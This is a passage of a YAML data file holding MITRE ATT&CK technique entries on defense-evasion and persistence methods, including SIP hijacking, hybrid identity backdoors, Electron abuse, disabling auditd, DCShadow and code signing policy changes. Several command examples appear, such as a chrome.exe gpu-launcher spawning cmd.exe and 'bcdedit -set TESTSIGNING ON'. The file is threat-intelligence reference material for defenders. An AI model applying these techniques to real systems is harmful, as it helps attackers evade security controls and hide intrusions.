a new file on disk. * Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). * **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking. Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Matt Graeber, @mattifestation, SpecterOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1553.003 atomic_tests: [] T1556.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f created: '2022-09-28T13:29:53.354Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/007 external_id: T1556.007 - source_name: Azure AD Connect for Read Teamers description: Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022. url: https://blog.xpnsec.com/azuread-connect-for-redteam/ - source_name: AADInternals Azure AD On-Prem to Cloud description: 'Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.' url: https://o365blog.com/post/on-prem_admin/ - source_name: MagicWeb description: 'Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.' url: https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/ - source_name: Azure AD Hybrid Identity description: Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022. url: https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn - source_name: Mandiant Azure AD Backdoors description: Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022. url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:40:10.913Z' name: Hybrid Identity description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Praetorian x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Office Suite - Identity Provider x_mitre_version: '1.1' atomic_tests: [] T1218.015: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3 created: '2024-03-07T19:32:35.383Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/015 external_id: T1218.015 - source_name: Electron 3 description: Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024. url: https://www.kaspersky.com/blog/electron-framework-security-issues/49035/ - source_name: Electron Security description: ElectronJS.org. (n.d.). Retrieved March 7, 2024. url: https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules - source_name: Electron 6-8 description: Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024. url: https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf - source_name: Electron 1 description: TOM ABAI. (2023, August 10). There’s a New Stealer Variant in Town, and It’s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024. url: https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/ - source_name: Electron 2 description: Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024. url: https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:24:54.174Z' name: Electron Applications description: |- Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1) Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8) Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Debabrata Sharma x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1562.012: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054 created: '2023-05-24T19:03:03.855Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/012 external_id: T1562.012 - source_name: IzyKnows auditd threat detection 2022 description: IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023. url: https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505 - source_name: Red Hat System Auditing description: Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - source_name: ESET Ebury Feb 2014 description: M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019. url: https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - source_name: Trustwave Honeypot SkidMap 2023 description: 'Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.' url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:20:10.121Z' name: 'Impair Defenses: Disable or Modify Linux Audit System' description: |- Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022) With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' identifier: T1562.012 atomic_tests: [] T1207: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1207 external_id: T1207 - source_name: DCShadow Blog description: Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018. url: https://www.dcshadow.com/ - source_name: Adsecurity Mimikatz Guide description: Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015. url: https://adsecurity.org/?page_id=1821 - source_name: GitHub DCSYNCMonitor description: Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018. url: https://github.com/shellster/DCSYNCMonitor - source_name: Microsoft DirSync description: Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018. url: https://msdn.microsoft.com/en-us/library/ms677626.aspx - source_name: ADDSecurity DCShadow Feb 2018 description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018. url: https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.823Z' name: Rogue Domain Controller description: |- Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vincent Le Toux x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1207 atomic_tests: [] T1553.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c created: '2021-04-23T01:04:57.161Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/006 external_id: T1553.006 - source_name: Apple Disable SIP description: Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. url: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection - source_name: F-Secure BlackEnergy 2014 description: 'F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.' url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf - source_name: FireEye HIKIT Rootkit Part 2 description: 'Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024.' url: https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html - source_name: Microsoft Unsigned Driver Apr 2017 description: Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test - source_name: Microsoft DSE June 2017 description: Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN - source_name: Microsoft TESTSIGNING Feb 2021 description: Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option - source_name: Unit42 AcidBox June 2020 description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.' url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ - source_name: GitHub Turla Driver Loader description: TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. url: https://github.com/hfiref0x/TDL object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.927Z' name: 'Subvert Trust Controls: Code Signing Policy Modification' description: "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Abel Morales, Exabeam x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS x_mitre_version: '1.1' identifier: T1553.006 atomic_tests: [] T1610: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 created: '2021-03-29T16:51:26.020Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1610 external_id: T1610 - source_name: AppSecco Kubernetes Namespace Breakout 2020 description: Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024. url: https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 - source_name: Aqua Build Images on Hosts description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.' url: https://blog.aquasec.com/malicious-container-image-docker-container-host - source_name: Docker Containers API description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021. url: https://docs.docker.com/engine/api/v1.41/#tag/Container - source_name: Kubernetes Workload Management description: Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024. url: https://kubernetes.io/docs/concepts/workloads/controllers/ - source_name: Kubeflow Pipelines description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021. url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ - source_name: Kubernetes Dashboard description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021. url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.017Z' name: Deploy a container description: |- Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020) Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: execution x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Pawan Kinger, @kingerpawan, Trend Micro - Alfredo Oliveira, Trend Micro - Idan Frimark, Cisco - Center for Threat-Informed Defense (CTID) - Magno Logan, @magnologan, Trend Micro - Ariel Shuper, Cisco - Vishwas Manral, McAfee - Yossi Weizman, Azure Defender Research Team - Joas Antonio dos Santos, @C0d3Cr4zy x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Containers x_mitre_version: '1.4' identifier: T1610 atomic_tests: [] T1112: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4 created: '2017-05-31T21:31:23.587Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1112 external_id: T1112 - source_name: CISA Russian Gov Critical Infra 2018 description: CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025. url: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors - source_name: CISA LockBit 2023 description: 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.' url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - source_name: Avaddon Ransomware 2021 description: 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.' url: https://arxiv.org/pdf/2102.04796 - source_name: Microsoft BlackCat Jun 2022 description: Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022. url: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ - source_name: Microsoft Reg description: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015. url: https://technet.microsoft.com/en-us/library/cc732643.aspx - source_name: Microsoft Remote description: Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015. url: https://technet.microsoft.com/en-us/library/cc754820.aspx - source_name: Microsoft 4657 APR 2017 description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.' url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657 - source_name: SpectorOps Hiding Reg Jul 2017 description: Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018. url: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 - source_name: Microsoft Reghide NOV 2006 description: Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018. url: https://docs.microsoft.com/sysinternals/downloads/reghide - source_name: Microsoft RegDelNull July 2016 description: Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018. url: https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull - source_name: TrendMicro POWELIKS AUG 2014 description: 'Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.' url: https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/ - source_name: Unit42 BabyShark Feb 2019 description: Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019. url: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.294Z' name: Modify Registry description: |- Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API. The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019) The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Bartosz Jerzman - Travis Smith, Tripwire - David Lu, Tripwire - Gerardo Santos x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.0' identifier: T1112 atomic_tests: [] T1574.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 created: '2020-03-13T17:48:58.999Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/008 external_id: T1574.008 - source_name: Microsoft Environment Property description: Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016. url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - source_name: Microsoft CreateProcess description: Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024. url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa - source_name: Microsoft WinExec description: Microsoft. (n.d.). WinExec function. Retrieved September 12, 2024. url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec - source_name: Windows NT Command Shell description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014. url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.665Z' name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking' description: |- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' 